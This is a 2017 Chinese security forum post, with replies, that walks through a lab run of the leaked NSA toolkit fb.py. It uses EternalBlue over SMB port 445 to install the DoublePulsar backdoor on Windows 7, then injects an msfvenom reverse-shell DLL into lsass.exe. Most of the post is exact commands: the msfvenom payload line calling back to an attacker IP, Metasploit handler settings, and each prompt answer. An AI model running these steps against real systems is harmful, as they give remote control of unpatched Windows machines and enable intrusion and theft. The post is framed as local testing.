首页
社区
课程
招聘
[分享]NSA工具fb.py eternalblue和doublepulsar模块测试
2017-5-3 21:26 13204

[分享]NSA工具fb.py eternalblue和doublepulsar模块测试

2017-5-3 21:26
13204

最近有点事,有一个多礼拜没关注安全。

看雪上面到现在也没搜到工具测试的文章,于是想写一下。


1.工具准备:
py2.6    https://www.python.org/download/releases/2.6.6/
pywin32    https://pypi.python.org/pypi/pywin32
NSA工具    https://github.com/misterch0c/shadowbroker

注意:python必须是2.6版本,pywin必须是32位,否则会出各种错误。

2.环境准备:


攻击机1(Win7_x86):

攻击机2(kali_x64):

靶机(win7_x64):


3.重现步骤:
在攻击机1(Win7_x86)上打开命令行,cd到shadowbroker底下的windows目录。

执行【python fb.py】

命令行提示需要输入:
目标IP地址,输入靶机IP地址【192.168.0.106】后,回车。
callback地址,即shell的返回地址,可以填写本地IP地址,也可以写【127.0.0.1】,回车。
是否使用重定向,输入【no】,回车。
日志路径,可以在shadowbroker目录下新建一个logs目录,最终路径为【C:\tools\shadowbroker-master\shadowbroker-master】,回车。

接下来就要创建项目:
索引0是创建新项目,直接回车创建新项目。
然后输入项目名称【test001】,回车。
是否设置目标日志路径为【C:\tools\shadowbroker-master\shadowbroker-master\logs\test001\z192.168.0.106】,yes直接回车。

此时已完成初始化信息配置。
然后使用eternalblue模块对目标进行fuzzing操作。
执行命令【use eternalblue】。
询问是否配置攻击参数,yes直接回车。
超时时间,默认60秒,回车。
目标IP,确认为目标IP,回车。
目标端口,确认为445,回车。
攻击之前验证目标SMB信息是否与我们选择的一致,true回车。
攻击之前,确认是否存在doublepulsar后门存在。true直接回车。
尝试攻击最多次数,默认3次,回车。
groom配置,默认12,回车。
目标操作系统选择,选择1,win7或2008,回车。
分发机制选择,带有fuzzing的传统部署模式,选择1,回车。
最后都是信息再确认,直接回车。

最后询问是否执行该插件,默认yes,回车,开始fuzzing向目标445端口发送数据,最后backdoor安装成功。

接下来就是使用double pulsar反弹一个shell回来。
执行【use doublepulsar】,超时设置,目标IP,目标端口,协议选择都为默认值,目标系统架构为x64,选择对应选项即可。

接下来到了选择对backdoor的操作,选择2 RunDLL 运行dll文件,此时需要使用msfvenom生成一个可以反弹shell的dll文件,存放于本地。


切换到攻击机2(kali_x64),打开终端,执行命令【msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.0.105 LPORT=8888 -a x86_64 --platform windows -f dll > shell.dll】

再打开msfconsole,使用multiple handler模块监听本地8888端口,一次执行
【use exploit/multi/handler】
【set PAYLOAD windows/x64/meterpreter/reverse_tcp】
【set LHOST 192.168.0.105】
【set LPORT 8888】
【exploit】


再回到攻击机1(Win7_x86),将kali里生成的shell.dll文件copy到C盘根目录。

回到命令行,写入dll文件的路径,【C:\shell.dll】
选择注入dll的序号,默认为1。
注入进程,默认为【lsass.exe】。
注入到进程里的命令,默认为空。

然后又要确认目标信息,都为默认值。最后执行该插件,注入dll,查看kali攻击机,返回一个meterpreter shell。


表格是我本地测试的结果(仅供参考),445端口都可以利用,其中只有Win7 32位会有重启的现象,只有Windows2008启用防火墙后依然可以攻击成功。

有人竟然测试2003和2012,在选择攻击目标的时候都没有2003或2012啊,怎么选?也有人说外网测试的很少成功的,内网一打一个准。

时间仓促,如有错误的地方请指正。


最后,有没有测试过135、139、3389成功的大神,或者其他模块,出个教程学习下。。。


阿里云助力开发者!2核2G 3M带宽不限流量!6.18限时价,开 发者可享99元/年,续费同价!

收藏
点赞1
打赏
分享
最新回复 (10)
雪    币: 6
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
switShell 2017-5-9 11:47
2
0
楼主,EternalBlue里面的DANE方式是什么用途?有没有研究?
雪    币: 2576
活跃值: (447)
能力值: ( LV2,RANK:85 )
在线值:
发帖
回帖
粉丝
wyfe 2017-5-9 13:41
3
0
学习一下
雪    币: 70
活跃值: (26)
能力值: ( LV3,RANK:20 )
在线值:
发帖
回帖
粉丝
afy 2017-5-11 13:56
4
0
switShell 楼主,EternalBlue里面的DANE方式是什么用途?有没有研究?
DNAE方式还没研究出来。。。
雪    币: 50
活跃值: (73)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
return 2017-5-14 16:05
5
0
135和3389以前都出过严重漏洞,估计没有公开的资料中的漏洞级别更高,赶快补吧。
雪    币: 2576
活跃值: (447)
能力值: ( LV2,RANK:85 )
在线值:
发帖
回帖
粉丝
wyfe 2017-5-14 16:56
6
0
return 135和3389以前都出过严重漏洞,估计没有公开的资料中的漏洞级别更高,赶快补吧。
有道理 
雪    币: 223
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
Dujinyang 2017-5-15 10:59
7
0
可以转载么
雪    币: 70
活跃值: (26)
能力值: ( LV3,RANK:20 )
在线值:
发帖
回帖
粉丝
afy 2017-5-18 11:34
8
0
Dujinyang 可以转载么
呃。。。当然可以!
雪    币: 3
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
A陌言 2017-6-8 03:20
9
0
我中毒了。。。
雪    币: 70
活跃值: (26)
能力值: ( LV3,RANK:20 )
在线值:
发帖
回帖
粉丝
afy 2017-6-9 10:07
10
0
A陌言 我中毒了。。。
重装系统吧。。。
雪    币: 3
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
A陌言 2017-6-9 17:39
11
0
楼主我不会用勒
游客
登录 | 注册 方可回帖
返回